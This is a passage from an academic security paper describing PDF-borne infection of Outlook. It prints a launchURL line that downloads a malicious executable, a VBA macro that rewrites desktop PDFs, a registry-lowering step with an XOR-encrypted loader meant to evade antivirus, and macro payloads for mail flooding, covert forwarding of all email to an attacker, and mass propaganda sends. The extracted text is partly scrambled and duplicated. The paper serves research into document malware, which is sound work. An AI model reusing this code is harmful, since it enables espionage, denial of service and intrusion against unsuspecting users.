is used. We also present our attack strategy. Section 4 present three operational scenario of attacks:<br />
email server DoS, email eavesdropp<strong>in</strong>g (espionage) and propaganda (<strong>in</strong>formation operations). Of course,<br />
many more scenarios are possible.<br />
Due to the lack of space, only the critical pieces of proof-of-concept codes are given <strong>in</strong> this paper. The<br />
complete source code can be obta<strong>in</strong>ed by contact<strong>in</strong>g the first author.<br />
2. Fundamental and technical concepts<br />
In order to present our attacks, the reader must learn about a few concepts related to office documents:<br />
PDF documents, documents with macros (Microsoft Office or OpenOffice) and the way the related<br />
security issues are organized both at the application and the operat<strong>in</strong>g system level.<br />
2.1 PDF structure and JavaScript<br />
Our attacks exploit the possibility for a PDF document (actually a script file written <strong>in</strong> PDF language) to<br />
embed JavaScript primitives and code. In order to manage JavaScript primitives – add<strong>in</strong>g, edit<strong>in</strong>g,<br />
embedd<strong>in</strong>g -- at the code level <strong>in</strong> PDF code itself, it is necessary to use application like Acrobat Editor (or<br />
equivalent applications like Scribus). Alternatively, it is also yet trickier, to work directly at the code level<br />
with a simple text editor.<br />
The full specifications of PDF format are available <strong>in</strong> the Adobe reference document (Adobe, 2007 &<br />
2008). We shall recall <strong>in</strong> this section only the important elements of the PDF. A PDF file is organized <strong>in</strong><br />
four different parts.<br />
The Header: The file beg<strong>in</strong>s with a magic number, which specifies that it is a PDF document while<br />
<strong>in</strong>dicat<strong>in</strong>g its version. Currently the PDF format is version 1.7. The next l<strong>in</strong>e consists of a s<strong>in</strong>gle object<br />
of type ``dictionary’’.<br />
The Body: It is the content itself of a PDF file, represented by objects organized <strong>in</strong> lists or <strong>in</strong> trees. It<br />
beg<strong>in</strong>s with an object named Document Catalog, whose presence is mandatory, and with the content<br />
basis (a dictionary which references some of the content objects).<br />
The Cross-reference table: this is the most critical part <strong>in</strong> any PDF files. This table conta<strong>in</strong>s all<br />
references to the different objects compos<strong>in</strong>g a PDF file. It is <strong>in</strong> fact a simple table of po<strong>in</strong>ters (<strong>in</strong> fact<br />
offsets). Any access to objects can be direct and random <strong>in</strong> order to optimize performances with<br />
respect to PDF file management and display. The table beg<strong>in</strong>s with the keyword xref.<br />
The Traiter: it is made of a dictionary object whose elements are special objects and of a po<strong>in</strong>ter to<br />
the Cross-reference table.<br />
Data displayed by PDF files are build from seven different k<strong>in</strong>d of objects, which are themselves<br />
organized <strong>in</strong> trees or/and <strong>in</strong> lists. To illustrate the structure of a simple PDF file conta<strong>in</strong><strong>in</strong>g a JavaScript<br />
piece of code which is executed whenever the PDF file is opened.<br />
92
Eric Filiol et al.<br />
27 0 obj<br />
><br />
stream<br />
function hello()<br />
{<br />
var myData = "Hello World";<br />
app.alert({ cMsg: myData, cTitle: "Acme Test<strong>in</strong>g Service" });<br />
}<br />
endstream<br />
endobj<br />
28 0 obj<br />
><br />
endobj<br />
29 0 obj<br />
><br />
endobj<br />
7 0 obj<br />
><br />
Endobj<br />
To execute the JavaScript part, we need to <strong>in</strong>sert an additional entry <strong>in</strong> the object catalog.<br />
/OpenAction ><br />
The keyword /OpenAction allows to specify that an action must be executed at the document open<strong>in</strong>g.<br />
The command takes either an array, or a dictionary as an argument. In the case of the JavaScript<br />
execution, a ``dictionary’’ object is used and flags /S and /JS must be used. The first one declares the<br />
presence of a script. Whenever followed by the sequence`` /JavaScript’’, it def<strong>in</strong>es the nature of language<br />
(here JavaScript). The next argument, \JS, def<strong>in</strong>es the function to be executed.<br />
More generally, a PDF is able to react to certa<strong>in</strong> events (the PDF is hence event-oriented). It is then<br />
possible to associate an action to an operation. All the possibilities are listed <strong>in</strong> the Adode reference<br />
documents (Adobe, 2008).<br />
2.2 Document macros and security configuration related to macros<br />
Any Microsoft Office/OpenOffice document can conta<strong>in</strong> macros whose purpose is to automatize a<br />
number of actions or perform different k<strong>in</strong>ds of <strong>in</strong>ternal/external actions. The ma<strong>in</strong> <strong>in</strong>tent is to provide<br />
ergonomics and easy-to-useness to users. Without loss of generality we will consider the case of<br />
Microsoft Office only on W<strong>in</strong>dows systems.<br />
The macro security level is mostly def<strong>in</strong>ed and enforced at the operat<strong>in</strong>g system level (Dechaux et al.,<br />
2010a & 2010b), <strong>in</strong> the W<strong>in</strong>dows registry base (user-specific section “HKEY_CURRENT_USER”). We<br />
f<strong>in</strong>d the level of security <strong>in</strong> the key “<strong>Security</strong>”, under the name “Level”.<br />
For Outlook 2007, the path for the key “<strong>Security</strong>” is<br />
HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Outlook<br />
while for Outlook 2010, the path for the key “<strong>Security</strong>” is<br />
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook<br />
The security level is a “REG_DWORD” and it ranges from 1 to 4 correspond<strong>in</strong>g to four possible security<br />
levels <strong>in</strong> Outlook (and for any other application Word, Excel, Powerpo<strong>in</strong>t…). Contrary to Microsoft Word<br />
or Excel, the values <strong>in</strong> the registry are the same as the correspond<strong>in</strong>g level of security<br />
Level 4: no warn<strong>in</strong>gs and disable all macros (registry value 0x00000004).<br />
Level 3: warn<strong>in</strong>gs for signed macros only. All unsigned macros are disabled (registry value<br />
0x00000003).<br />
93
Eric Filiol et al.<br />
Level 2: warn<strong>in</strong>gs for all macros (registry value 0x00000002).<br />
Level 1: no security check for macros (not recommended) (registry value 0x00000001).<br />
To achieve our attacks, it will be necessary to change the value of this “REG_DWORD” to the lowest<br />
possible value, i.e. the “Level 1: 0x00000001” (of course without trigger<strong>in</strong>g any alert/warn<strong>in</strong>g [Dechaux et<br />
al., 2010a & 2010b] neither form the operat<strong>in</strong>g system nor any antivirus software <strong>in</strong> place).<br />
2.3 Outlook macros<br />
Let us now expla<strong>in</strong> where Outlook macros are stored. The latter are located <strong>in</strong> a special file, whose<br />
extension is ``OTM”. This OTM file OTM is user-specific, as registry variable are. This file is named<br />
``VbaProject.OTM” and it path is given by:<br />
C:\Users\\AppData\Roam<strong>in</strong>g\Microsoft\Outlook<br />
It is not possible to edit this file directly and access to the <strong>in</strong>formation <strong>in</strong> it. Indeed it is compiled by the<br />
Microsoft Office suite whenever it is opened. However, s<strong>in</strong>ce it is a user-specific file, we can replace it by<br />
a malicious version of it (e.g. conta<strong>in</strong><strong>in</strong>g our malicious macros).<br />
All Outlook macros are written <strong>in</strong> Visual Basic. Any macro can call external functions from the W<strong>in</strong>dows<br />
API. Regard<strong>in</strong>g the execution of macros <strong>in</strong> Outlook, we are go<strong>in</strong>g to use three different macro execution<br />
modes, whenever Outlook is opened or an email is sent or received.<br />
Private Sub Application_ItemSend(ByVal Item As Object, Cancel As Boolean)<br />
End Sub<br />
Private Sub Application_NewMail( )<br />
End Sub<br />
Private Sub Application_Startup( )<br />
End Sub<br />
Accord<strong>in</strong>g to the type of attack whom we are go<strong>in</strong>g to perform, we will use one to three modes. For some<br />
reason (ma<strong>in</strong>ly to bypass antiviral detection mechanisms), we have to use delay <strong>in</strong> attacks. For that<br />
purpose, it is also necessary to def<strong>in</strong>e a sleep function, which is not a Visual Basic primitive but a<br />
W<strong>in</strong>dows API function.<br />
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)<br />
3. PDF files as <strong>in</strong>fection vectors<br />
Contrary to (malicious) Word or Excel documents, there are no Outlook documents. So we must imag<strong>in</strong>e<br />
a different k<strong>in</strong>d of <strong>in</strong>fection vector to <strong>in</strong>stall malicious macros. We are go<strong>in</strong>g to use PDF files.<br />
3.1 Attack strategy<br />
Microsoft macros are not executed by default. We know that the configuration of Outlook allows or not<br />
the execution of the macro and this configuration is stored <strong>in</strong> the registry. It is then necessary to change<br />
this sett<strong>in</strong>g <strong>in</strong> a way or another: either through a user’s direct action or through an <strong>in</strong>nocent-look<strong>in</strong>g<br />
external program. But any suspicious user is not likely to execute executables. But any user generally<br />
accepts to open PDF files. Consequently we are go<strong>in</strong>g to use this powerful <strong>in</strong>fection vector.<br />
Our attack is based on k-ary malware (Filiol, 2007). The general pr<strong>in</strong>ciple consists <strong>in</strong> us<strong>in</strong>g k different,<br />
<strong>in</strong>nocent look<strong>in</strong>g files, whose actions are comb<strong>in</strong>ed to perform a viral attack. The malware code is split<br />
<strong>in</strong>to k different parts which can be <strong>in</strong>dependent one from the other, or not. Each part is responsible for a<br />
specific action which has been assigned to it.<br />
For our attack we used k = 3 as follows:<br />
The first part (the <strong>in</strong>fectious agent) is devoted to the <strong>in</strong>itial <strong>in</strong>fection (primo <strong>in</strong>fection or <strong>in</strong>fection<br />
setup).<br />
The second part (which is <strong>in</strong>stalled by the first one) modifies the target system to lower it security: the<br />
macro security level is set to level 1, the malicious macro is <strong>in</strong>stalled.<br />
94
Eric Filiol et al.<br />
The third part (conta<strong>in</strong>ed <strong>in</strong> the malicious macro) is dedicated to the payload (the offensive action)<br />
which is triggered whenever an email is sent by the user.<br />
Our <strong>in</strong>fection strategy (see Figure 1) is based on malicious PDF file.<br />
Figure 1: PDF file-based <strong>in</strong>fection strategy.<br />
3.2 Introduction of the <strong>in</strong>fectious agent<br />
We chose a very simple yet powerful technique. The agent is downloaded from the PDF file which has<br />
been sent to the user. However it will not download the executable directly but, <strong>in</strong>stead it conta<strong>in</strong>s a<br />
JavaScript which calls the default browser. The latter itself performs the download.<br />
this.lauchURL("http://www.compromisedSite/MyMalware.exe"):<br />
The implementation consists <strong>in</strong> a simple l<strong>in</strong>e of code. It calls the document through the object ``this’’ and<br />
then calls the launchURL method with the address from which the download shall be performed, as an<br />
argument. Upon execution this simple l<strong>in</strong>e of code downloads the file ``MyMalware.exe’’ immediately.<br />
The weakness - on which our attack relies - lies <strong>in</strong> the browsers’ <strong>in</strong>ability to manage the security<br />
efficiently. In order to have a universal and portable <strong>in</strong>fection step, we can alternatively embark the<br />
executable <strong>in</strong> the PDF file which then has to extract it.<br />
Among many methods to perform this, we used the “ExportDataObject” and “saveAs” methods. The most<br />
<strong>in</strong>terest<strong>in</strong>g approach is the use first one because it allows the execution of the executable, contrary to the<br />
95
Eric Filiol et al.<br />
method “saveAs” which does not allow it. It is necessary to use the possibilities of the PDF format by<br />
us<strong>in</strong>g launch primitives (Filiol 2008). However we have to synchronize the download and execution<br />
actions to make sure that the <strong>in</strong>fectious agent itself is executed safely (without trigger<strong>in</strong>g antivirus alert).<br />
3.3 PDF Infection mechanism<br />
Figure 2: Infection mechanism<br />
To go on with the <strong>in</strong>fection and operate on a larger scale, we chose to <strong>in</strong>fect all PDF on the desktop of<br />
the victim. We are go<strong>in</strong>g to list all the documents which have a PDF extension and <strong>in</strong>fect them. To do<br />
this, we wrote a macro that will be executed whenever Outlook is opened, by us<strong>in</strong>g the<br />
“Application_StartUp( )” mode. Hence we modify the PDF code by <strong>in</strong>sert<strong>in</strong>g<br />
our malicious executable<br />
(ME) <strong>in</strong> the PDF file and add<strong>in</strong>g the JavaScript primitive to execute ME.<br />
Here follows the code that performs this <strong>in</strong>fection. It is divided <strong>in</strong>to two parts (see Figure 2):<br />
The def<strong>in</strong>ition of variables and objects required along with the recovery of the user’s name.<br />
The <strong>in</strong>fection of PDF files which are on the desktop.<br />
The macro has to <strong>in</strong>sert the JavaScript code, /JS, <strong>in</strong> the Catalog object of the document so that the<br />
JavaScript is executed. If the document is present then it is enough<br />
to add an additional entry. In the case<br />
of<br />
the object does not exist, it will be necessary to create it.<br />
Private Sub Application_Startup()<br />
' Error management<br />
On Error Resume Next<br />
' Variable def<strong>in</strong>ition<br />
Dim objFSO, objDossier, objFichier<br />
Dim Repertoire, UserName<br />
' Get the session username<br />
96
Eric Filiol et al.<br />
UserName = Environ("username")<br />
Repertoire = "C:\Users\" & UserName & "\Desktop"<br />
' Object def<strong>in</strong>ition<br />
Set objFSO = CreateObject("Script<strong>in</strong>g.FileSystemObject")<br />
Set objDossier = objFSO.GetFolder(Repertoire)<br />
' For each pdf file on the desktop<br />
If (objDossier.Files.Count > 0) Then<br />
For Each<br />
objFichier In objDossier.Files<br />
If (InStr(1, objFichier.Name,<br />
".pdf", 1) > 0) Then<br />
' Pdf path creation<br />
path = Repertoire & "\" & objFichier.Name<br />
' Open the file <strong>in</strong> read<strong>in</strong>g<br />
Open p ath For Input As #1<br />
While Not<br />
Eof(1)<br />
L<strong>in</strong>e <strong>in</strong>put #1, buff<br />
table = table + buff + Chr(13)<br />
Wend<br />
Close #1<br />
' Research<br />
' Modification<br />
' Open the file <strong>in</strong> writ<strong>in</strong>g<br />
Open path For Output As<br />
#1<br />
Pr<strong>in</strong>t<br />
#1, table<br />
Close #1<br />
End If<br />
Next<br />
End If<br />
' Variable release<br />
objResultat.Close<br />
Set objDossier = Noth<strong>in</strong>g<br />
Set<br />
objFSO = Noth<strong>in</strong>g<br />
End<br />
Sub<br />
3.4 Modification of the macro security sett<strong>in</strong>g<br />
' Read the data<br />
To conduct our attacks, it is necessary to modify the relevant registry keys and to set the value “Level” to<br />
1.<br />
For that purpose, we use three functions RegCreateKeyEx( ), RegSetValueEx( ) and RegCloseKey( ).<br />
The function RegCreateKeyEx( ) creates the key “<strong>Security</strong>” if it does not exist <strong>in</strong> the registry, otherwise it<br />
will open it. The function RegSetValueEx( ) modifies the value of the variable “Level” to set it to 1. The<br />
function RegCloseKey( ) closes the key “<strong>Security</strong>”. The correspond<strong>in</strong>g code to modify the Outlook macro<br />
security level is given hereafter. It is worth mention<strong>in</strong>g that this piece of code does not trigger any antiviral<br />
software<br />
alert.<br />
<strong>in</strong>t<br />
{<br />
ma<strong>in</strong>(<strong>in</strong>t ac, char **av)<br />
<strong>in</strong>t fd, rt, size;<br />
char *str<strong>in</strong>gToDecipher = "Hello world,<br />
we had a lovely sunny day";<br />
char<br />
*file;<br />
unsigned char *pkey;<br />
/* Generat<strong>in</strong>g the environmental key */<br />
pkey = envGenKey("/Applications",<br />
pkey);<br />
if (pkey == NULL)<br />
return -1;<br />
97
puts("Key Generated");<br />
Eric Filiol et al.<br />
/* choos<strong>in</strong>g the mode, cipher or decipher */<br />
if (strncmp(av[1],<br />
"-e", 2) == 0)<br />
{<br />
puts("CIPHER MODE");<br />
/* the cipher<br />
mode */<br />
if (ac != 3)<br />
{<br />
puts("USAGE: ECIW<br />
-e str<strong>in</strong>gToCipher");<br />
return<br />
-1;<br />
}<br />
/* we give the str<strong>in</strong>g to cipher<br />
on the command l<strong>in</strong>e */<br />
file = cypher(av[2],<br />
pkey);<br />
if (file == NULL)<br />
{<br />
puts("ERROR cipher<strong>in</strong>g<br />
process");<br />
return<br />
-1;<br />
}<br />
pr<strong>in</strong>tf("The<br />
encrypted data is ==> %s\n", file);<br />
}<br />
/* Decipher the str<strong>in</strong>g */<br />
else<br />
if(strncmp(av[1], "-d", 2) == 0)<br />
{<br />
puts("DECIPHER<br />
MODE");<br />
if (ac != 4)<br />
{<br />
puts("USAGE: ECIW<br />
-d str<strong>in</strong>gToDecipher outputFile");<br />
return<br />
-1;<br />
}<br />
if (ac == 3)<br />
file = cypher(str<strong>in</strong>gToDecipher, pkey);<br />
else<br />
file = cypher(av[2], pkey);<br />
fd = open(av[3],<br />
O_WRONLY);<br />
if (fd == -1)<br />
return -1;<br />
size = strlen(file);<br />
rt = write(fd, file, size);<br />
close(fd);<br />
if (rt == -1)<br />
return -1;<br />
}<br />
return<br />
0;<br />
}<br />
3.5 Anti-antiviral mechanisms<br />
For a better protection aga<strong>in</strong>st antivirus detection, we have used a number of obfuscation techniques.<br />
The strategy, we have chosen is to operate at the b<strong>in</strong>ary level. The macro is embedded <strong>in</strong> the b<strong>in</strong>ary file<br />
under an encrypted form to avoid be<strong>in</strong>g detected by anti-virus. The <strong>in</strong>fection process has then first<br />
to<br />
decipher<br />
the macro <strong>in</strong> memory and to overwrite Outlook’s orig<strong>in</strong>al macro with the malicious macro.<br />
98
Eric Filiol et al.<br />
The macro is enciphered us<strong>in</strong>g one of the simplest methods: the constant XOR function. In Dechaux et<br />
al. (2010a) it has been exposed how this lame method was still successful at defeat<strong>in</strong>g all antivirus<br />
software. The encryption key is not stored <strong>in</strong>side the b<strong>in</strong>ary file to prevent static analysis. Instead we use<br />
an environmental key as suggested <strong>in</strong> (Filiol 2007). It is generated only whenever needed. From the<br />
perspective of malware analyst, the only way to recover the key is either to use Brute Force or by<br />
conduct<strong>in</strong>g a dynamic analysis, follow<strong>in</strong>g the execution step by step.<br />
Here it is the ma<strong>in</strong> function for the extraction of the macro file:<br />
<strong>in</strong>t ma<strong>in</strong>(<strong>in</strong>t ac, char **av)<br />
{<br />
<strong>in</strong>t fd, rt, size;<br />
char *str<strong>in</strong>gToDecipher = "Hello world, we had a lovely sunny day";<br />
char *file;<br />
unsigned char *pkey;<br />
/* Generat<strong>in</strong>g the environmental key */<br />
pkey = envGenKey("/Applications", pkey);<br />
if (pkey == NULL)<br />
return -1;<br />
puts("Key Generated");<br />
/* choos<strong>in</strong>g the mode, cipher or decipher */<br />
if (strncmp(av[1], "-e", 2) == 0)<br />
{<br />
puts("CIPHER MODE");<br />
/* the cipher mode */<br />
if (ac != 3)<br />
{<br />
puts("USAGE: ECIW -e str<strong>in</strong>gToCipher");<br />
return -1;<br />
}<br />
/* we give the str<strong>in</strong>g to cipher on the command l<strong>in</strong>e */<br />
file = cypher(av[2], pkey);<br />
if (file == NULL)<br />
{<br />
puts("ERROR cipher<strong>in</strong>g process");<br />
return -1;<br />
}<br />
pr<strong>in</strong>tf("The encrypted data is ==> %s\n", file);<br />
}<br />
/* Decipher the str<strong>in</strong>g */<br />
else if(strncmp(av[1], "-d", 2) == 0)<br />
{<br />
puts("DECIPHER MODE");<br />
if (ac != 4)<br />
{<br />
puts("USAGE: ECIW -d str<strong>in</strong>gToDecipher outputFile");<br />
return -1;<br />
}<br />
if (ac == 3)<br />
file = cypher(str<strong>in</strong>gToDecipher, pkey);<br />
else<br />
file = cypher(av[2], pkey);<br />
fd = open(av[3], O_WRONLY);<br />
if (fd == -1)<br />
99
eturn -1;<br />
size = strlen(file);<br />
rt = write(fd, file, size);<br />
close(fd);<br />
if (rt == -1)<br />
return -1;<br />
}<br />
return 0;<br />
}<br />
4. Three operational scenario of attacks<br />
Eric Filiol et al.<br />
Let us now present how to use the previous attack techniques <strong>in</strong> real cases.<br />
4.1 Email server DoS<br />
This attack is very simple; we are go<strong>in</strong>g to send <strong>in</strong>f<strong>in</strong>ity of emails from a target user’s client at a specific<br />
date. We chose for this example, September 11 th , 2011, ten years after the Tw<strong>in</strong> Towers bomb<strong>in</strong>g. The<br />
Denial of Service (DoS) will strike either a governmental state email server or a stock exchange email<br />
server <strong>in</strong> order to block the economy.<br />
We get the current date of the system and compare it with September 11 th . If it matches or exceeds the<br />
due date, we create <strong>in</strong>f<strong>in</strong>ity of emails with a subject, a body, and a specific address. Of course we delete<br />
them all so that the user does not realize anyth<strong>in</strong>g (secure deletion of any evidence to fool any forensics<br />
attempt).<br />
For the DOS to be effective, we have to <strong>in</strong>fect thousands of different clients because every email on the<br />
same customer is sent one after the other. Thus our attack targets one million customers, even more,<br />
who will send themselves <strong>in</strong>f<strong>in</strong>ity of emails, every day from September 11 th on.<br />
Our code is split <strong>in</strong>to two parts, the <strong>in</strong>itialization step and the payload. In the <strong>in</strong>itialization part, there is an<br />
error handl<strong>in</strong>g to avoid alert<strong>in</strong>g the user, a variable def<strong>in</strong>ition and then the def<strong>in</strong>ition of the email object<br />
type “Outlook.Application”. In the payload part, we have the recovery of the system date, the comparison<br />
with the date that we fixed, and then the send<strong>in</strong>g of emails. This macro will run whenever the Outook<br />
application is launched (use of the “Application_Startup( )” mode.<br />
Private Sub Application_Startup()<br />
On Error Resume Next<br />
Dim ol As New Outlook.Application<br />
Dim olmail As MailItem<br />
Dim i As Integer<br />
Dim ActualDate As Date<br />
' Object def<strong>in</strong>ition<br />
Set ol = CreateObject("Outlook.Application")<br />
ActualDate = Date<br />
' If the date is September 11th or newer<br />
If (ActualDate >= "11/09/2011") Then<br />
While 1<br />
' Mail def<strong>in</strong>ition<br />
Set mail = ol.CreateItem(olMailItem)<br />
' Mail creation<br />
With olmail<br />
.To = "email_address"<br />
.Subject = "email_subject"<br />
100
End If<br />
End Sub<br />
Wend<br />
Eric Filiol et al.<br />
.body = "email_body"<br />
.DeleteAfterSubmit = True<br />
.Send<br />
End With<br />
Set olmail = Noth<strong>in</strong>g<br />
Figure 3: eMail server Denial of Service (DoS)<br />
101
4.2 Email wiretapp<strong>in</strong>g<br />
Eric Filiol et al.<br />
Here the attacker wants to access to the target user’s email <strong>in</strong> an illegitimate way (figure 4). First of all,<br />
every email <strong>in</strong> the <strong>in</strong>box as well as those sent by the victim is duplicated whenever Outlook is started up.<br />
All those email copies can be saved as a txt file which rema<strong>in</strong>s <strong>in</strong>visible to the user. This text file (the<br />
stolen emails) is then sent by email to the attacker’s email address. This part will be executed through the<br />
“Application_StartUp( )” mode.<br />
Whenever an email is sent or received by the victim, then a copy is sent to the attacker <strong>in</strong> a transparent<br />
way (use of the “Application_ItemSend( )” and “Application_NewMail( )” modes).<br />
Figure 4: eMail wiretapp<strong>in</strong>g<br />
Here follows the source code of the attack (extract).<br />
' Function launched when a mail is sended<br />
Private Sub Application_ItemSend(ByVal Item As Object, Cancel As Boolean)<br />
On Error Resume Next<br />
i = 0<br />
Sleep 1000<br />
' For each mail <strong>in</strong> the Sended folder<br />
For Each myItem In myInbox.Items<br />
If i = 0 Then<br />
Set myAttachments = myItem.Attachments<br />
' Get all <strong>in</strong>formations<br />
body = "From: " & myItem.SenderName & _<br />
" < " & myItem.SenderEmailAddress & " >" & Chr(13) _<br />
& "Sended: " & myItem.SentOn & Chr(13) _<br />
& "To: " & myItem.To & Chr(13) _<br />
& "Cc: " & myItem.CC & Chr(13) _<br />
& "Subject: " & myItem.Subject & Chr(13) & Chr(13) _<br />
& myItem.body<br />
' Get Attachments<br />
If myAttachments.Count > 0 Then<br />
102
End If<br />
Next myItem<br />
End Sub<br />
End If<br />
Eric Filiol et al.<br />
'for all attachments do...<br />
For j = 1 To myAttachments.Count<br />
' save them to dest<strong>in</strong>ation<br />
myAttachments(j).SaveAsFile Folder_PJ_Sent & _<br />
myAttachments(j).DisplayName<br />
Next j<br />
Set olmail = ol.CreateItem(olMailItem)<br />
' Mail creation<br />
With olmail<br />
.To = "email_address"<br />
.Subject = myItem.Subject<br />
.body = body<br />
If myAttachments.Count > 0 Then<br />
.myAttachments.Add Folder_PJ_Received & _<br />
myAttachments(j).DisplayName<br />
End If<br />
.DeleteAfterSubmit = True<br />
.Send<br />
End With<br />
Set olmail = Noth<strong>in</strong>g<br />
' Set up the next mail<br />
Set myItem = myItems.GetNext<br />
i = i + 1<br />
Sleep 1000<br />
' Function launched when a mail is received<br />
Private Sub Application_NewMail()<br />
On Error Resume Next<br />
i = 0<br />
Sleep 1000<br />
' For each mail <strong>in</strong> the Inbox folder<br />
For Each myItem In myInbox.Items<br />
If i = 0 Then<br />
Set myAttachments = myItem.Attachments<br />
i = i + 1<br />
Sleep 1000<br />
End If<br />
Next myItem<br />
End Sub<br />
' Function launched when the application is launched<br />
Private Sub Application_StartUp()<br />
On Error Resume Next<br />
i = 0<br />
For Each myItem In myInbox.Items<br />
Set myAttachments = myItem.Attachments<br />
i = i + 1<br />
Sleep 1000<br />
Next myItem<br />
i = 0<br />
103
Eric Filiol et al.<br />
For Each myItem2 In myInbox2.Items<br />
Set myAttachments2 = myItem2.Attachments<br />
i = i + 1<br />
Sleep 1000<br />
Next myItem2<br />
End Sub<br />
4.3 Propaganda and <strong>in</strong>formation operations<br />
In this attack, we are go<strong>in</strong>g to send one thousands of propaganda emails whenever the user sends an<br />
email. As an operational example, let us consider a US senior officer <strong>in</strong> Afghanistan. He uses emails to<br />
keep <strong>in</strong> touch with his family. Once <strong>in</strong>fected, whenever he sends an email, at the same time thousands of<br />
emails are sent to Muslim citizens <strong>in</strong> an <strong>in</strong>visible way. These emails conta<strong>in</strong> propaganda, anti-Muslim<br />
contents…<br />
Here follows the correspond<strong>in</strong>g source code (extract):<br />
Private Sub Application_ItemSend(ByVal Item As Object, Cancel As Boolean)<br />
On Error Resume Next<br />
Dim ol As New Outlook.Application<br />
Dim olmail As MailItem<br />
Dim i As Integer<br />
Dim Tableau(1 To 1000) As Str<strong>in</strong>g<br />
Next i<br />
End Sub<br />
Tableau(1) = "email_address1"<br />
' ...<br />
Tableau(1000) = "email_address1000"<br />
' Object def<strong>in</strong>ition<br />
Set ol = CreateObject("Outlook.Application")<br />
For i = 1 To 1000 Step 1<br />
Set olmail = ol.CreateItem(olMailItem)<br />
5. Conclusion<br />
' Mail creation<br />
With olmail<br />
.To = Tableau(i)<br />
.Subject = "email_subject"<br />
.Body = "email_body"<br />
.DeleteAfterSubmit = True<br />
.Send<br />
End With<br />
Set olmail = Noth<strong>in</strong>g<br />
From this study, we could realize how it is ridiculously easy to <strong>in</strong>fect a user’s computer and to exploit his<br />
email client without him know<strong>in</strong>g it and how such unsophisticated cyber-attacks could <strong>in</strong>flict major<br />
damage on the nations’ security: Propaganda, espionage, denial of service are some of the examples of<br />
new threats that such basic attacks can carry out. One can imag<strong>in</strong>e the <strong>in</strong>terest of such tools <strong>in</strong> cyber<br />
warfare to collect <strong>in</strong>telligence <strong>in</strong> support of terrorist operations and to communicate and dissem<strong>in</strong>ate<br />
propaganda.<br />
What is worry<strong>in</strong>g is that the requisite level of knowledge and skills needed to implement this technique is<br />
amaz<strong>in</strong>gly low while the nuisance potential of this k<strong>in</strong>d of cyber attack is very high.<br />
104
Eric Filiol et al.<br />
The fact that such attacks can be launched by the man <strong>in</strong> the street and that the used cyber attack tools<br />
are very common among the population, (emails and office documents) will <strong>in</strong>evitably <strong>in</strong>crease the scope<br />
and the scale of the attack. It will make attacks easy to launch and difficult to trace.<br />
References<br />
Adobe Developer Support (2008) Document management – Portable document format – Part 1: PDF 1.7,<br />
http://www.adobe.com/content/dam/Adobe/en/devnet/pdf/pdfs/PDF32000_2008.pdf.<br />
Adobe Developer Support (2007) Adobe Acrobat SDK 8.1 JavaScript for Acrobat API Reference for Microsoft<br />
W<strong>in</strong>dows and Mac OS, http://www.adobe.com/content/dam/Adobe/en/devnet/acrobat/pdfs/js_api_reference.<br />
Blonce, A., Filiol and E., Frayssignes, L. (2008) Portable Document Format (PDF) <strong>Security</strong> Analysis and Malware<br />
Threats, Black Hat, Europe, http://www.blackhat.com/presentations/bh-europe-08/Filiol/Presentation/bh-eu-08filiol.pdf.<br />
Dechaux, J., Filiol, E. and Fiza<strong>in</strong>e, J.P. (2010) Office documents: New Weapons of Cyberwarfare, Hack.Lu,<br />
Luxembourg, http://archive.hack.lu/2010/Filiol-Office-Documents-New-Weapons-of-Cyberwarfare-paper.pdf.<br />
Dechaux, J., Fiza<strong>in</strong>e, J.P., Griveau, R. and Jaafar, K. (2010) New Trends <strong>in</strong> Malware Sample-Independent AV<br />
Evaluation Techniques with Respect to Document Malware, Eicar 2010, France.<br />
Filiol, E. (2007) Technique virales avancées, IRIS International Series, Spr<strong>in</strong>ger Edition.<br />
Saumil, S. (2010) Exploit Delivery, Hack.Lu, Luxembourg, http://archive.hack.lu/2010/Saumil-Exploit-Deliveryslides.pdf.<br />
Stevens, D. (2010) Analyz<strong>in</strong>g Malicious PDF Files, Hack.Lu, Luxembourg,<br />
http://blog.didierstevens.com/2010/09/26/free-malicious-pdf-analysis-e-book.<br />
105
The Computer <strong>Security</strong> of Public/Open Computer Spaces:<br />
Feedback of a Field Study <strong>in</strong> Europe<br />
Eric Filiol<br />
ESIEA - Operational virology and cryptology laboratory, France<br />
filiol@esiea.fr<br />
https://sites.google.com/site/ericfiliol/<br />
Abstract: Many public places offer free or low-pay<strong>in</strong>g accesses to the Internet network: Internet cafes, hotels<br />
(especially high quality hotels). These places are experienc<strong>in</strong>g a large attendance, especially near sites like railway<br />
stations, airports, <strong>in</strong>ternational conference lounge....A number of questions then arises regard<strong>in</strong>g the computer<br />
security aspects: what k<strong>in</strong>d of users visit these places and use those <strong>in</strong>ternet accesses, what security risks do they<br />
face and especially how ill-<strong>in</strong>tentioned actors (terrorists, organized crime, spies ...) could use those accesses to<br />
<strong>in</strong>fr<strong>in</strong>g<strong>in</strong>g users and possibly a company network. This article presents the results of a wide study conducted <strong>in</strong><br />
Europe dur<strong>in</strong>g the second half of 2010 <strong>in</strong> these "public/open Internet places”. The report is alarm<strong>in</strong>g. Not only do<br />
users take an enormous risk to themselves but seriously jeopardize their bus<strong>in</strong>esses. This study reveals <strong>in</strong>deed that<br />
contrary to the popular belief – accord<strong>in</strong>g to which most users of these sites are tourists or <strong>in</strong>dividuals only - the<br />
majority of users of these sites are professionals, employees of large firms who moreover are the custodians of high<br />
power or of high responsibility (CEO, CSO or CTO of large companies) or even of private data of third-party people<br />
(lawyers, physicians...). Even worse, the lack of real security on all these Internet open-access can be exploited and<br />
perverted – after a suitable and necessary <strong>in</strong>telligence phase -- to conduct cyber attacks aga<strong>in</strong>st companies,<br />
government offices and bodies, critical <strong>in</strong>frastructure...) thus caus<strong>in</strong>g an extreme prejudice.<br />
Keywords: computer security, malware, <strong>in</strong>telligence gather<strong>in</strong>g, computer network attack (CNA), computer network<br />
operation (CNO), computer terrorism<br />
1. Introduction<br />
Many open/public computer spaces are freely available and offer a direct access to the Internet network:<br />
Internet-cafes, Internet computer <strong>in</strong> hotels (especially top quality hotels), airport, railway station,<br />
<strong>in</strong>ternational conference lounges… In a context of an ever-grow<strong>in</strong>g need for security and control,<br />
especially with respect to terrorist activities and economic <strong>in</strong>telligence (active and passive), then a<br />
number of question arises:<br />
What the overall security of those open computer spaces? It is possible to mount/launch national or<br />
worldwide attacks <strong>in</strong> an untraceable and uncontrolled way?<br />
As far as the security of companies is concerned, it is possible to target them easily and perform<br />
active and passive economic <strong>in</strong>telligence operations and bypass all their (system and network)<br />
security?<br />
